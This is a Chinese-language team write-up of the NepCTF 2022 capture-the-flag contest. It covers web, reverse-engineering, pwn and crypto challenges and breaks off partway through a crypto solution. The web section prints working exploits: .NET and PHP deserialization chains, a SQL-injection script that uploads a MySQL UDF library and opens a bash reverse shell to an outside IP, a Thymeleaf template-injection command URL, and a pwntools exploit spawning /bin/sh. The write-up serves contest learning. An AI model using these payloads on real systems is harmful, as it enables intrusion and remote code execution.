NepCTF2022 Writeups - CNSS

Web

QR Code Maker

json反序列化漏洞，反序列化到Debug类加载上传的dll

1	{"$type":"qrcode_maker.Debug, qrcode_maker","ClassName":"./uploads/2111c416-2d20-4a7c-9393-12b0889a17f4","MethodName":"ClassLibrary5.Class1"}

using System;
using System.Collections.Generic;
using System.Diagnostics;
using System.IO;
using System.Linq;
using System.Text;
using System.Threading.Tasks;

namespace ClassLibrary5
{
    public class Class1
    {
        public Class1()
        {
            String text = File.ReadAllText("/flag");
            throw new Exception(text);
        }
    }
}

Just Kidding

随便搜个poc就打通了

<?php


namespace Faker {
    class Generator
    {
        protected $providers = [];
        protected $formatters = [];

        function __construct()
        {
            $this->formatter = "dispatch";
            $this->formatters = 9999;
        }
    }
}

namespace Illuminate\Broadcasting {
    class PendingBroadcast
    {
        public function __construct()
        {
            $this->event = "cat /flag";
            $this->events = new \Faker\Generator();
        }
    }
}

namespace Symfony\Component\Mime\Part {
    abstract class AbstractPart
    {
        private $headers = null;
    }

    class SMimePart extends AbstractPart
    {
        protected $_headers;
        public $h3rmesk1t;

        function __construct()
        {
            $this->_headers = ["dispatch" => "system"];
            $this->h3rmesk1t = new \Illuminate\Broadcasting\PendingBroadcast();
        }
    }
}


namespace {
    $pop = new \Symfony\Component\Mime\Part\SMimePart();
    $ser = preg_replace("/([^\{]*\{)(.*)(s:49.*)(\})/", "\\1\\3\\2\\4", serialize($pop));
    echo base64_encode(str_replace("i:9999", "R:2", $ser));
}

博学多闻的花花

二次注入 + udf, 可能不需要二次注入，刚开始觉得二次注入有回显，但是/flag没权限读

import random

import requests

s1 = requests.session()
s2 = requests.session()

proxies = {
    'http': 'http://127.0.0.1:8080',
}

def rnd():
    return ''.join(random.sample('zyxwvutsrqponmlkjihgfedcbaABCDEFGHIJKLMNOPQRSTUVWXYZ', 10))

def refreshAccount():
    url = 'http://nep.lemonprefect.cn:20712/register.php'
    username = rnd()

    data = {
        'username': username,
        'studentid': username,
        'submit': '提交'
    }
    r = s1.post(url, data=data, proxies=proxies)
    url = 'http://nep.lemonprefect.cn:20712/login.php'
    r = s1.post(url, data=data, proxies=proxies)


def doSql(s):
    refreshAccount()
    url = 'http://nep.lemonprefect.cn:20712/index.php'
    data = {
        'q1': '1',
        'q2': '2',
        'q3': '3',
        'q4': '4',
        'q5': "111');" + s + ";",
    }
    r = s1.post(url, data=data, proxies=proxies)


def updateAdmin(password):
    doSql(f"update users set studentid='{password}' where username='admin'")


def register(username, studentid):
    doSql(f'insert into users values (NULL, "{username}", "{studentid}");')


def loginAdmin():
    updateAdmin('114514')
    url = 'http://nep.lemonprefect.cn:20712/login.php'
    data = {
        'username': 'admin',
        'studentid': '114514',
        'submit': '提交'
    }
    r = s2.post(url, data=data, proxies=proxies)


# updateAdmin('admin')

name = rnd()
print(name)
payload = "0x7f454c4602010100000000000000000003003e0001000000d00c0000000000004000000000000000e8180000000000000000000040003800050040001a00190001000000050000000000000000000000000000000000000000000000000000001415000000000000141500000000000000002000000000000100000006000000181500000000000018152000000000001815200000000000700200000000000080020000000000000000200000000000020000000600000040150000000000004015200000000000401520000000000090010000000000009001000000000000080000000000000050e57464040000006412000000000000641200000000000064120000000000009c000000000000009c00000000000000040000000000000051e5746406000000000000000000000000000000000000000000000000000000000000000000000000000000000000000800000000000000250000002b0000001500000005000000280000001e000000000000000000000006000000000000000c00000000000000070000002a00000009000000210000000000000000000000270000000b0000002200000018000000240000000e00000000000000040000001d0000001600000000000000130000000000000000000000120000002300000010000000250000001a0000000f000000000000000000000000000000000000001b00000000000000030000000000000000000000000000000000000000000000000000002900000014000000000000001900000020000000000000000a00000011000000000000000000000000000000000000000d0000002600000017000000000000000800000000000000000000000000000000000000000000001f0000001c0000000000000000000000000000000000000000000000020000000000000011000000140000000200000007000000800803499119c4c93da4400398046883140000001600000017000000190000001b0000001d0000002000000022000000000000002300000000000000240000002500000027000000290000002a00000000000000ce2cc0ba673c7690ebd3ef0e78722788b98df10ed871581cc1e2f7dea868be12bbe3927c7e8b92cd1e7066a9c3f9bfba745bb073371974ec4345d5ecc5a62c1cc3138aff36ac68ae3b9fd4a0ac73d1c525681b320b5911feab5fbe120000000000000000000000000000000000000000000000000000000003000900a00b0000000000000000000000000000010000002000000000000000000000000000000000000000250000002000000000000000000000000000000000000000e0000000120000000000000000000000de01000000000000790100001200000000000000000000007700000000000000ba0000001200000000000000000000003504000000000000f5000000120000000000000000000000c2010000000000009e010000120000000000000000000000d900000000000000fb000000120000000000000000000000050000000000000016000000220000000000000000000000fe00000000000000cf000000120000000000000000000000ad00000000000000880100001200000000000000000000008000000000000000ab010000120000000000000000000000250100000000000010010000120000000000000000000000dc00000000000000c7000000120000000000000000000000c200000000000000b5000000120000000000000000000000cc02000000000000ed000000120000000000000000000000e802000000000000e70000001200000000000000000000009b00000000000000c200000012000000000000000000000028000000000000008001000012000b007a100000000000006e000000000000007500000012000b00a70d00000000000001000000000000001000000012000c00781100000000000000000000000000003f01000012000b001a100000000000002d000000000000001f01000012000900a00b0000000000000000000000000000c30100001000f1ff881720000000000000000000000000009600000012000b00ab0d00000000000001000000000000007001000012000b0066100000000000001400000000000000cf0100001000f1ff981720000000000000000000000000005600000012000b00a50d00000000000001000000000000000201000012000b002e0f0000000000002900000000000000a301000012000b00f71000000000000041000000000000003900000012000b00a40d00000000000001000000000000003201000012000b00ea0f0000000000003000000000000000bc0100001000f1ff881720000000000000000000000000006500000012000b00a60d00000000000001000000000000002501000012000b00800f0000000000006a000000000000008500000012000b00a80d00000000000003000000000000001701000012000b00570f00000000000029000000000000005501000012000b0047100000000000001f00000000000000a900000012000b00ac0d0000000000009a000000000000008f01000012000b00e8100000000000000f00000000000000d700000012000b00460e000000000000e800000000000000005f5f676d6f6e5f73746172745f5f005f66696e69005f5f6378615f66696e616c697a65005f4a765f5265676973746572436c6173736573006c69625f6d7973716c7564665f7379735f696e666f5f6465696e6974007379735f6765745f6465696e6974007379735f657865635f6465696e6974007379735f6576616c5f6465696e6974007379735f62696e6576616c5f696e6974007379735f62696e6576616c5f6465696e6974007379735f62696e6576616c00666f726b00737973636f6e66006d6d6170007374726e6370790077616974706964007379735f6576616c006d616c6c6f6300706f70656e007265616c6c6f630066676574730070636c6f7365007379735f6576616c5f696e697400737472637079007379735f657865635f696e6974007379735f7365745f696e6974007379735f6765745f696e6974006c69625f6d7973716c7564665f7379735f696e666f006c69625f6d7973716c7564665f7379735f696e666f5f696e6974007379735f657865630073797374656d007379735f73657400736574656e76007379735f7365745f6465696e69740066726565007379735f67657400676574656e76006c6962632e736f2e36005f6564617461005f5f6273735f7374617274005f656e6400474c4942435f322e322e35000000000000000000020002000200020002000200020002000200020002000200020002000200020001000100010001000100010001000100010001000100010001000100010001000100010001000100010001000100000001000100b20100001000000000000000751a690900000200d401000000000000801720000000000008000000000000008017200000000000d01620000000000006000000020000000000000000000000d81620000000000006000000030000000000000000000000e016200000000000060000000a00000000000000000000000017200000000000070000000400000000000000000000000817200000000000070000000500000000000000000000001017200000000000070000000600000000000000000000001817200000000000070000000700000000000000000000002017200000000000070000000800000000000000000000002817200000000000070000000900000000000000000000003017200000000000070000000a00000000000000000000003817200000000000070000000b00000000000000000000004017200000000000070000000c00000000000000000000004817200000000000070000000d00000000000000000000005017200000000000070000000e00000000000000000000005817200000000000070000000f00000000000000000000006017200000000000070000001000000000000000000000006817200000000000070000001100000000000000000000007017200000000000070000001200000000000000000000007817200000000000070000001300000000000000000000004883ec08e827010000e8c2010000e88d0500004883c408c3ff35320b2000ff25340b20000f1f4000ff25320b20006800000000e9e0ffffffff252a0b20006801000000e9d0ffffffff25220b20006802000000e9c0ffffffff251a0b20006803000000e9b0ffffffff25120b20006804000000e9a0ffffffff250a0b20006805000000e990ffffffff25020b20006806000000e980ffffffff25fa0a20006807000000e970ffffffff25f20a20006808000000e960ffffffff25ea0a20006809000000e950ffffffff25e20a2000680a000000e940ffffffff25da0a2000680b000000e930ffffffff25d20a2000680c000000e920ffffffff25ca0a2000680d000000e910ffffffff25c20a2000680e000000e900ffffffff25ba0a2000680f000000e9f0feffff00000000000000004883ec08488b05f50920004885c07402ffd04883c408c390909090909090909055803d900a2000004889e5415453756248833dd809200000740c488b3d6f0a2000e812ffffff488d05130820004c8d2504082000488b15650a20004c29e048c1f803488d58ff4839da73200f1f440000488d4201488905450a200041ff14c4488b153a0a20004839da72e5c605260a2000015b415cc9c3660f1f8400000000005548833dbf072000004889e57422488b05530920004885c07416488d3da70720004989c3c941ffe30f1f840000000000c9c39090c3c3c3c331c0c3c341544883c9ff4989f455534883ec10488b4610488b3831c0f2ae48f7d1488d69ffe8b6feffff83f80089c77c61754fbf1e000000e803feffff488d70ff4531c94531c031ffb921000000ba07000000488d042e48f7d64821c6e8aefeffff4883f8ff4889c37427498b4424104889ea4889df488b30e852feffffffd3eb0cba0100000031f6e802feffff31c0eb05b8010000005a595b5d415cc34157bf00040000415641554531ed415455534889f34883ec1848894c24104c89442408e85afdffffbf010000004989c6e84dfdffffc600004889c5488b4310488d356a030000488b38e814feffff4989c7eb374c89f731c04883c9fff2ae4889ef48f7d1488d59ff4d8d641d004c89e6e8ddfdffff4a8d3c284889da4c89f64d89e54889c5e8a8fdffff4c89fabe080000004c89f7e818fdffff4885c075b44c89ffe82bfdffff807d0000750a488b442408c60001eb1f42c6442dff0031c04883c9ff4889eff2ae488b44241048f7d148ffc94889084883c4184889e85b5d415c415d415e415fc34883ec08833e014889d7750b488b460831d2833800740e488d353a020000e817fdffffb20188d05ec34883ec08833e014889d7750b488b460831d2833800740e488d3511020000e8eefcffffb20188d05fc3554889fd534889d34883ec08833e027409488d3519020000eb3f488b46088338007409488d3526020000eb2dc7400400000000488b4618488b384883c70248037808e801fcffff31d24885c0488945107511488d351f0200004889dfe887fcffffb20141585b88d05dc34883ec08833e014889f94889d77510488b46088338007507c6010131c0eb0e488d3576010000e853fcffffb0014159c34154488d35ef0100004989cc4889d7534889d34883ec08e832fcffff49c704241e0000004889d8415a5b415cc34883ec0831c0833e004889d7740e488d35d5010000e807fcffffb001415bc34883ec08488b4610488b38e862fbffff5a4898c34883ec28488b46184c8b4f104989f2488b08488b46104c89cf488b004d8d4409014889c6f3a44c89c7498b4218488b0041c6040100498b4210498b5218488b4008488b4a08ba010000004889c6f3a44c89c64c89cf498b4218488b400841c6040000e867fbffff4883c4284898c3488b7f104885ff7405e912fbffffc3554889cd534c89c34883ec08488b4610488b38e849fbffff4885c04889c27505c60301eb1531c04883c9ff4889d7f2ae48f7d148ffc948894d00595b4889d05dc39090909090909090554889e5534883ec08488b05c80320004883f8ff7419488d1dbb0320000f1f004883eb08ffd0488b034883f8ff75f14883c4085bc9c390904883ec08e86ffbffff4883c408c345787065637465642065786163746c79206f6e6520737472696e67207479706520706172616d657465720045787065637465642065786163746c792074776f20617267756d656e747300457870656374656420737472696e67207479706520666f72206e616d6520706172616d6574657200436f756c64206e6f7420616c6c6f63617465206d656d6f7279006c69625f6d7973716c7564665f7379732076657273696f6e20302e302e34004e6f20617267756d656e747320616c6c6f77656420287564663a206c69625f6d7973716c7564665f7379735f696e666f290000011b033b980000001200000040fbffffb400000041fbffffcc00000042fbffffe400000043fbfffffc00000044fbffff1401000047fbffff2c01000048fbffff44010000e2fbffff6c010000cafcffffa4010000f3fcffffbc0100001cfdffffd401000086fdfffff4010000b6fdffff0c020000e3fdffff2c02000002feffff4402000016feffff5c02000084feffff7402000093feffff8c0200001400000000000000017a5200017810011b0c070890010000140000001c00000084faffff01000000000000000000000014000000340000006dfaffff010000000000000000000000140000004c00000056faffff01000000000000000000000014000000640000003ffaffff010000000000000000000000140000007c00000028faffff030000000000000000000000140000009400000013faffff01000000000000000000000024000000ac000000fcf9ffff9a00000000420e108c02480e18410e20440e3083048603000000000034000000d40000006efaffffe800000000420e10470e18420e208d048e038f02450e28410e30410e38830786068c05470e50000000000000140000000c0100001efbffff2900000000440e100000000014000000240100002ffbffff2900000000440e10000000001c0000003c01000040fbffff6a00000000410e108602440e188303470e200000140000005c0100008afbffff3000000000440e10000000001c00000074010000a2fbffff2d00000000420e108c024e0e188303470e2000001400000094010000affbffff1f00000000440e100000000014000000ac010000b6fbffff1400000000440e100000000014000000c4010000b2fbffff6e00000000440e300000000014000000dc01000008fcffff0f00000000000000000000001c000000f4010000fffbffff4100000000410e108602440e188303470e2000000000000000000000ffffffffffffffff0000000000000000ffffffffffffffff000000000000000000000000000000000100000000000000b2010000000000000c00000000000000a00b0000000000000d00000000000000781100000000000004000000000000005801000000000000f5feff6f00000000a00200000000000005000000000000006807000000000000060000000000000060030000000000000a00000000000000e0010000000000000b0000000000000018000000000000000300000000000000e81620000000000002000000000000008001000000000000140000000000000007000000000000001700000000000000200a0000000000000700000000000000c0090000000000000800000000000000600000000000000009000000000000001800000000000000feffff6f00000000a009000000000000ffffff6f000000000100000000000000f0ffff6f000000004809000000000000f9ffff6f0000000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000401520000000000000000000000000000000000000000000ce0b000000000000de0b000000000000ee0b000000000000fe0b0000000000000e0c0000000000001e0c0000000000002e0c0000000000003e0c0000000000004e0c0000000000005e0c0000000000006e0c0000000000007e0c0000000000008e0c0000000000009e0c000000000000ae0c000000000000be0c0000000000008017200000000000004743433a202844656269616e20342e332e322d312e312920342e332e3200004743433a202844656269616e20342e332e322d312e312920342e332e3200004743433a202844656269616e20342e332e322d312e312920342e332e3200004743433a202844656269616e20342e332e322d312e312920342e332e3200004743433a202844656269616e20342e332e322d312e312920342e332e3200002e7368737472746162002e676e752e68617368002e64796e73796d002e64796e737472002e676e752e76657273696f6e002e676e752e76657273696f6e5f72002e72656c612e64796e002e72656c612e706c74002e696e6974002e74657874002e66696e69002e726f64617461002e65685f6672616d655f686472002e65685f6672616d65002e63746f7273002e64746f7273002e6a6372002e64796e616d6963002e676f74002e676f742e706c74002e64617461002e627373002e636f6d6d656e7400000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000f0000000500000002000000000000005801000000000000580100000000000048010000000000000300000000000000080000000000000004000000000000000b000000f6ffff6f0200000000000000a002000000000000a002000000000000c000000000000000030000000000000008000000000000000000000000000000150000000b00000002000000000000006003000000000000600300000000000008040000000000000400000002000000080000000000000018000000000000001d00000003000000020000000000000068070000000000006807000000000000e00100000000000000000000000000000100000000000000000000000000000025000000ffffff6f020000000000000048090000000000004809000000000000560000000000000003000000000000000200000000000000020000000000000032000000feffff6f0200000000000000a009000000000000a009000000000000200000000000000004000000010000000800000000000000000000000000000041000000040000000200000000000000c009000000000000c00900000000000060000000000000000300000000000000080000000000000018000000000000004b000000040000000200000000000000200a000000000000200a0000000000008001000000000000030000000a0000000800000000000000180000000000000055000000010000000600000000000000a00b000000000000a00b000000000000180000000000000000000000000000000400000000000000000000000000000050000000010000000600000000000000b80b000000000000b80b00000000000010010000000000000000000000000000040000000000000010000000000000005b000000010000000600000000000000d00c000000000000d00c000000000000a80400000000000000000000000000001000000000000000000000000000000061000000010000000600000000000000781100000000000078110000000000000e000000000000000000000000000000040000000000000000000000000000006700000001000000320000000000000086110000000000008611000000000000dd000000000000000000000000000000010000000000000001000000000000006f000000010000000200000000000000641200000000000064120000000000009c000000000000000000000000000000040000000000000000000000000000007d000000010000000200000000000000001300000000000000130000000000001402000000000000000000000000000008000000000000000000000000000000870000000100000003000000000000001815200000000000181500000000000010000000000000000000000000000000080000000000000000000000000000008e000000010000000300000000000000281520000000000028150000000000001000000000000000000000000000000008000000000000000000000000000000950000000100000003000000000000003815200000000000381500000000000008000000000000000000000000000000080000000000000000000000000000009a000000060000000300000000000000401520000000000040150000000000009001000000000000040000000000000008000000000000001000000000000000a3000000010000000300000000000000d016200000000000d0160000000000001800000000000000000000000000000008000000000000000800000000000000a8000000010000000300000000000000e816200000000000e8160000000000009800000000000000000000000000000008000000000000000800000000000000b1000000010000000300000000000000801720000000000080170000000000000800000000000000000000000000000008000000000000000000000000000000b7000000080000000300000000000000881720000000000088170000000000001000000000000000000000000000000008000000000000000000000000000000bc000000010000000000000000000000000000000000000088170000000000009b000000000000000000000000000000010000000000000000000000000000000100000003000000000000000000000000000000000000002318000000000000c500000000000000000000000000000001000000000000000000000000000000"
#register(f"ddd';select {payload} Into dumpfile '/usr/lib64/mysql/plugin/myudf2.so';", name)
# register(f"8888';create function sys_eval returns string soname 'myudf2.so';", name)
register(f"admin' union select 1,2,sys_eval('bash -i >& /dev/tcp/101.200.202.216/7777 0>&1');", name)

# register("22' union select 1,2, @@version_compile_machine;", 'cewrcr')

弹shell，发现curl有 SUID/SGID

1	curl file:///flag

Challenger

Thymeleaf SSTI

1	http://a9b2d86d-824f-4218-8f5d-d28226b5f16d.nep.lemonprefect.cn:81/eval?lang=__$%7bnew%20java.util.Scanner(T(java.lang.Runtime).getRuntime().exec(%22cat%20/flag%22).getInputStream()).next()%7d__::

Reverse

快来签到

ida 加载，直接在图形界面看到 flag

We_can_gone

动态调试

先定位字符串，然后下断点 run； F8 到 check 函数 sub_599630

逻辑很简单，字符串 NepCTF{…} 长度为23，然后跟 dword_64b6e4处数组比较

交叉引用，没有发现更改的它的地方，直接提取

flag 为 NepCTF{U9eT_t0_th3TRUE}

Error ISA

先静态分析 mian函数逻辑

先看 check 1 是对输入调用 sub_4021C0 ；逻辑很简单可以得出 NepCTF{ } 格式，中间 32 位

关键在 check 2 部分，因为通过异常处理改变了程序的执行流，所以必须动态调试，单纯静态会调入陷阱中（有一个将输入转为 16 进制，并 AES 加密的函数）但动态会发现断不进入；

发现正确执行流后，由于汇编使用 jmp 和 ret 指令，导致 ida 并没有解析真正执行的部分；可以用 ida+patch 掉jmp 到 ret 的部分，F5 后

需要注意对xxtea的魔改，中间以同样的方式 (异常和 JMP+ret)改变了程序的执行路径并在 ida 中隐藏，以同样的方式 patch 后 F5

编写脚本：

#include<stdio.h>
#include<stdint.h>
#include<string.h>
int __cdecl sub_402710(char * a1, unsigned __int64 a2, unsigned int a3)
{
	int result; // eax
	unsigned __int64 i; // [esp+Ch] [ebp-8h]

	result = 0;
	for (i = 0; i < a2; ++i)
	{
		*(uint32_t *)(a1 + i) ^= a3;
		if (((a3 >> (i % 0x20)) & 1) != 0)
			a3 *= ~a3;
		if (i < a2 - (*((uint8_t *)&a3 + (unsigned int)i % 4) & 3) - 4)
			i += *((uint8_t *)&a3 + i % 3) & 3;
		result = (i + 1) >> 32;
	}
	return result;
}
#define DELTA 0x11332278    //0x1C938FE5
#define MX (((z>>5^y<<2) + (y>>3^z<<4)) ^ ((sum^y) + (key[(p&3)^e] ^z)))  
#define mx1 ((((dword_423034[2 * (rounds-1)] ^ z)>>5^y<<2) + (y>>3^((dword_423034[2 * (rounds-1)] ^z)<<4))) ^ ((sum^y) + (key[(p&3)^e] ^ (dword_423034[2 * (rounds-1)] ^z ))))  

uint32_t dword_423034[21] = { 0x7D386644, 0x63531E6D, 0x42473C18, 0x76777830, 0x2F511F49, 0x19764E36, 0x44441B7C, 0x1B435926, 0x54405436

,0x3544384B, 0x3F321B25, 0x51336D15, 0x684B776C, 0x2D2B7118, 0x77272868, 0x23316D56, 0x564F7E16, 0x6C1E3079
,0x6118164B, 0x65321226, 0x2577666D };
void btea(uint32_t *v, int n, uint32_t const key[4])
{
	uint32_t y, z, sum;
	unsigned  p, rounds, e, tot_round;
	if (n > 1)            /* Coding Part */
	{
		rounds = 6 + 52 / n;
		sum = 0;
		z = v[n - 1];
		do
		{
			sum -= DELTA;
			e = (sum >> 2) & 3;
			for (p = 0; p < n - 1; p++)
			{
				y = v[p + 1];
				z = v[p] += MX;
			}
			y = v[0];
			z = v[n - 1] += mx1;
		} while (--rounds);
	}
	else if (n < -1)      /* Decoding Part */
	{
		n = -n;
		rounds = 6 + 52 / n;
		tot_round =rounds;
		rounds  =1;
		sum = 0x42cd84d8;
		y = v[0];
		do
		{
			e = (sum >> 2) & 3;
			p = n - 1;
			z = v[n - 2];
			y = v[n - 1] -= mx1;
			for (p = (n - 1 -1); p > 0; p--)
			{
				z = v[p - 1];
				y = v[p] -= MX;
			}
			z = v[n - 1];
			y = v[0] -= MX;
			sum += DELTA;
			rounds++;
		} while (--tot_round);
	}
}
int main()
{

	
	uint8_t k[16] = {0x4E, 0x45, 0x50, 0x4E, 0x45, 0x50, 0x43, 0x54, 0x46, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00};
	uint32_t * k1 = (uint32_t *) k;
	uint8_t flag[] = { 0x17, 0x2F, 0x82, 0x18, 0xD7, 0xBF, 0xFA, 0xB1, 0x69, 0x41, 0x41, 0x81, 0x3A, 0xC3, 0x02, 0xD1,
0xA0, 0x5C, 0xDA, 0x7A, 0x63, 0xAF, 0xCA, 0xCE, 0xA5, 0xDF, 0xE0, 0xFC, 0x98, 0x5E, 0x82, 0x0C,
0xCC, 0x24, 0x39, 0x38, };
	printf("flag is DepCTF{");
	btea((uint32_t *)flag, -9, k1);
	sub_402710((char *)flag, 0x1d, 0xDEADBEEF);
	for (int i = 0; i < 32; i++)
		printf("%c", flag[i]);
  printf("}");
}

pwn

Nyan Cat

在读取的时候有溢出，这里选择跳转两次，首先在data段读入/bin/sh以及指向其的指针，再次返回溢出的函数，然后读取0xb个字节使得eax寄存器为0xb，布置栈数据刚好调用sys_execve,exp如下

from pwn import *
context.log_level = "debug"
context.arch= "i386"
def debug(cmd=''):
    gdb.attach(io,cmd)
    pause()
DEBUG = 0
elf  = ELF("./main")
if(DEBUG):
    io = process("./main")
else:
    io = remote("nep.lemonprefect.cn",28098)

io.recvuntil(b"\x5b\x6d\x0a")
addr =  0x804be00
int80_ret = 0x080480ea
add_esp = 0x8048190
ebcdx= 0x8048115
payload = b'a'*16+p32(0x80480f0)+p32(0x80481a0)+p32(0)+p32(addr)+p32(addr)+p32(0)
bin_sh = b'/bin/sh\x00'+p32(0)+p32(addr)
#debug()
io.send(payload)
#sleep(5)
io.recvuntil("Good Luck!\n")
#sleep(5)
io.send(bin_sh)
addr1 = 0x804ba00

payload2 =  b'a'*16+p32(0x80480f0)+p32(0x8048115)+p32(0)+p32(addr1)+p32(addr+12)+p32(0)
io.recvuntil(b"\x5b\x6d\x0a")
io.send(payload2)
io.recvuntil("Good Luck!\n")
io.send(b'/bin/sh\x00\x00\x00\x00')
io.interactive()

Crypto

p和q很近，可以选择爆破距离或者yafu分解，然后利用中国剩余定理得到c mod n,解密即可

COA_RSA

根据论文，选取参数e时是这样选取的 $e = \frac{k\phi}{a}-b$ ,这样根据b的正负性，规约出来的SVP应该是下面两者之一 : $(m^b,1),(1,m^{-b})$ 。如果是正的就是前者，负的就是后者。m是18比特长度，大概是145位，而n是2048位，由于目标向量满足闵可夫斯基界，那么可以粗略得到: $|b| \times 145 \times 2<2048 \rightarrow |b|\leq7$ 并且我们可以根据e和N通过N/e估计出 $\frac{k}{a} = \frac{1}{7}$ ,爆破b即可

for i in range(-7,8):
	phi.append((e+i)*7)
for p in phi :
	d = inverse(e,phi)
	print(long_to_bytes(pow(c,d,N)))
#b'N0t_4lw4ys_l4tt1ce'

bd_key

d给了，由于si的数量级很小，只有2**16，可以通过爆破si，进而恢复出key然后解密AES就行了。

from Crypto.Util.number import *
class Dual_EC():
    def __init__(self, s_0=None):
        from Crypto.Util.number import getRandomNBitInteger
       
        # Init curve P-256
        self.p = 115792089210356248762697446949407573530086143415290314195533631308867097853951
        self.n = 115792089210356248762697446949407573529996955224135760342422259061068512044369
        self.b = 0x5ac635d8aa3a93e7b3ebbd55769886bc651d06b0cc53b0f63bce3c3e27d2604b
        self.curve = EllipticCurve(GF(self.p), [-3, self.b])
        
        # Init P, Q
        self.Qx = 0x6b17d1f2e12c4247f8bce6e563a440f277037d812deb33a0f4a13945d898c296
        self.Qy = 0x4fe342e2fe1a7f9b8ee7eb4a7c0f9e162bce33576b315ececbb6406837bf51f5
        self.Q = self.curve(self.Qx, self.Qy)
        self.d = 66604141534275704476445937214374130642068729921454877238730830814793201802544
        self.P = self.d * self.Q      
        
        # Init state, h_adin
        if s_0 == None:
            self.s_i = int(floor((2^16-1)*random()))
        else:
            self.s_i = s_0
        self.h_adin = 0
        
        #self.__leak_par()

        
    def __leak_par(self):
        print(f"curve = {self.curve}")
        print(f"P = {self.P}")
        print(f"d = {self.d}")
        print(f"Q = {self.Q}")

    # Output 32bytes now.          
    def __Dual_EC_DRBG(self, h_adin = 0): 
        t_i = self.s_i ^^ h_adin
        self.s_i = (t_i*self.P)[0].lift()
        r_i = (self.s_i*self.Q)[0].lift()
        return r_i

    def getRandomNBytes(self, N:int) -> bytes:
        result = 0
        req = (N/32).ceil()

        for i in range(req):
            if(i == 0):
                result = (result << (32*8)) | self.__Dual_EC_DRBG(self.h_adin)
            else:
                result = (result << (32*8)) | self.__Dual_EC_DRBG()

        self.s_i = (self.s_i * self.P)[0].lift()

        result = result >> ((32*req - N)*8)
        return long_to_bytes(result)
c = 59100197418944667413449341413044666843726352095054393072750502893110293231642
si = 30970
dbrg = Dual_EC(si)
if(bytes_to_long(dbrg.getRandomNBytes(32))==c):
    print("find !!!")
    print(f"si = {i}")
key = dbrg.getRandomNBytes(16)
print(f'key = {key}')

timing

侧信道攻击。审计关键代码我们可以发现有如下判定

if(t2-t1<1e7):
   sleep(0.01-(((t2-t1))/1000000000.0))
if(t2-t1<1e8):
   sleep(0.1-(((t2-t1))/1000000000.0))

在用快速幂计算倍点dG的时候，如果d的二进制位为1，则需要耗时大概0.1s，如果是0，则需要耗时0.01s。同时我们可以知道sk二进制位中有8个1，剩下都是0。第一次交互的时候输入0，得到的时间记为t，假设有s个0位，那么我们可以列出如下方程

8*0.1+s1*0.01=t1

可以估算知道sk大概有s+8位。以2^(s1+8)为基准，先尽量往大了猜。如果猜错的话耗时会非常长（大概12s-21s不等），如果猜对了耗时会缩短很多，因为该位的1，以及夹在两个1中间的0(♂)都不用计算了。知道确切位之后，以该位为基准可以再列相同的方程

7*0.1+s2*0.01=t2

可以知道第二个1大概在2^{(s2+7)左右，同样往大了猜，传入2}(s1+8)+2^(s2+7)。同理根据时间突变明显的点可以确定第二个1，以此类推不断猜就行。

中学数学

注意到p*q随p增加是单调递增，直接二分求p就行了

这里上界取的是sqrt(n)，验了一下p*q发现大了

from gmpy2 import *
from Crypto.Util.number import *
#from secret import flag
#p=getPrime(1024)
#q=next_prime(p+(p>>500))
 
e = 0x10001
n = 13776679754786305830793674359562910178503525293501875259698297791987196248336062506951151345232816992904634767521007443634017633687862289928715870204388479258679577315915061740028494078672493226329115247979108035669870651598111762906959057540508657823948600824548819666985698501483261504641066030188603032714383272686110228221709062681957025702835354151145335986966796484545336983392388743498515384930244837403932600464428196236533563039992819408281355416477094656741439388971695931526610641826910750926961557362454734732247864647404836037293509009829775634926600458845832805085222154851310850740227722601054242115507
c = 6253975396639688013947622483271226838902346034187241970785550830715516801386404802832796746428068354515287579293520381463797045055114065533348514688044281004266071342722261719304097175009672596062130939189624163728328429608123325223000160428261082507446604698345173189268359115612698883860396660563679801383563588818099088505120717238037463747828729693649297904035253985982099474025883550074375828799938384533606092448272306356003096283602697757642323962299153853559914553690456801745940925602411053578841756504799815771173679267389055390097241148454899265156705442028845650177138185876173539754631720573266723359186
R = 117374101720892025379926580554846261172050814835019928395780473173988319063025811236820315274901477473357362631312549265502060280672262331623398126551102411368254100359545898567189007742828060352893742491663283756824477966687393803226060355532504331569001619648536493882952835335488931507816927988398082228539
L = 1
while L < R:
	p = (L+R) >> 1
	q = next_prime(p+(p>>500))
	print(p)
	if p*q == n:
		print("[+]P:", p)
		print("[+]Q:", q)
		break
	if p*q > n:
		R = p
	else:
		L = p

phi = (p-1)*(q-1)
d = invert(e, phi)
m = pow(c, d, n)
print(long_to_bytes(m))
"""
[+]P: 117374101720892014802773132009595684550070475491812959407700503409964134408139790074777009067182443277766119990724185784535299405313567262727445965171074427891089886767667348073044876487630536209840494632852807000951512126317010773423294553929289375585831391437922887752426888245829185481732564145862194694837
[+]Q: 117374101720892014802773132009595684550070475491812959407700503409964134408139790074777009067182443277766119990724185784535299405313567262727445965171110284932237912222026220958706260216927350725324469350893507592837055161338352274913301924684983498346654165295930055956026431077232360603315231271970883987911
"""

p or s

注意到enc可以等效成32个GF(2)上的方程，有32个未知元（plaintext）和32个未知的key通过某些运算得到的常数。

注意到flag开头有已知明文flag，用这个求key就结束了。

#from secret import keys
from Crypto.Util.number import *
#assert(len(keys)==6)
Pbox=[
[0, 3, 6, 9, 10, 11, 13, 16, 18, 19, 20, 24, 25, 27, 28, 29, 30, 31],
[0, 1, 3, 8, 9, 11, 12, 14, 16, 18, 19, 23, 24, 25, 26, 28, 29],
[0, 1, 2, 3, 9, 10, 11, 13, 19, 20, 22, 25, 27, 28, 29, 31],
[0, 2, 3, 5, 6, 7, 8, 13, 16, 19, 21, 25, 26, 27, 28],
[2, 4, 6, 7, 9, 11, 12, 13, 16, 17, 20, 21, 22, 23, 24, 25, 27, 31],
[2, 10, 13, 15, 16, 17, 21, 22, 23, 24, 29, 31],
[1, 2, 8, 11, 12, 13, 16, 17, 19, 21, 22, 24, 25, 26, 27, 28, 30, 31],
[0, 3, 6, 13, 14, 17, 19, 21, 22, 23, 26, 27, 28],
[1, 5, 7, 8, 11, 12, 14, 15, 19, 23, 25, 27, 31],
[0, 2, 3, 6, 7, 8, 9, 10, 11, 12, 16, 18, 19, 22, 23, 24, 25, 26, 27, 28],
[0, 1, 6, 7, 10, 15, 16, 21, 24, 25, 29, 30],
[1, 4, 5, 6, 7, 12, 13, 15, 18, 19, 20, 22, 26, 27, 29, 31],
